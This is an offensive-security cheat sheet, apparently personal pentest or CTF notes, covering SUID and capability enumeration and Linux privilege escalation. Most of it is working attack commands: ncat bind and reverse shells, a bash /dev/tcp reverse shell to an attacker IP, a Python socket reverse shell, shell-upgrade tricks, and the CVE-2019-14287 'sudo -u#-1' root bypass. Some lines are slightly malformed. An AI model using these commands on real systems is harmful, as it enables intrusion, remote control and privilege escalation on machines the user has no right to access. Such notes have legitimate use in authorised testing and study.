GTFO Bins_________________________________________
Find SUIDs_________________________________________
how to find another users capabilities or sudo permissions?
find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / - user <name> -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
SGID
find / -perm /2000
Both SUID and SGID
find / -perm /6000
Capabilities
getcap -r / 2>/dev/null
Shells______________________________________________
Start bind shell (on victim):
ncat -l -p PORT -e "/bin/bash -i"
Connect to bind shell (on attacker):
ncat --ip-- --port--
Listen for reverse shell (on attacker):
ncat -l -p PORT
Start reverse shell (on victim):
ncat -e "/bin/bash -i" IPaddr
upgrade shell
python -c 'import pty; pty.spawn("/bin/bash")'
SHELL=/bin/bash script -q /dev/null
Reverse Shell
bash -c "bash -i >& /dev/tcp/(tun0 ip add)/4444 0>&1" - Useful if you find a .sh file on remote system
Python Reverse Shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Useful site for upgrading shells:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys
Enumeration & Priv Esc Scripts_______________________
LinENUM script: Download a local copy of LinEnum
Linpeas script: Download a copy of Linpeas
lse.sh script: Download a copy of lse
Sudo Information: Usage and Vulnerability_______________
Usage:
What is the vulnerability:
Sudo vulnerability found in version < 1.8.28 - CVE-2019-14287
issue stems from the following entry in sudoers:
{user name} ALL=(ALL:!root_ NOPASSWD: ALL
this would prevent anyone running as superuser/admin, so sudo -u#0 will not work, however, sudo -u#-1 will work.
sudo -u#-1 (unsigned equivalent 4294967295)(command)
Note: only works if you have non root permission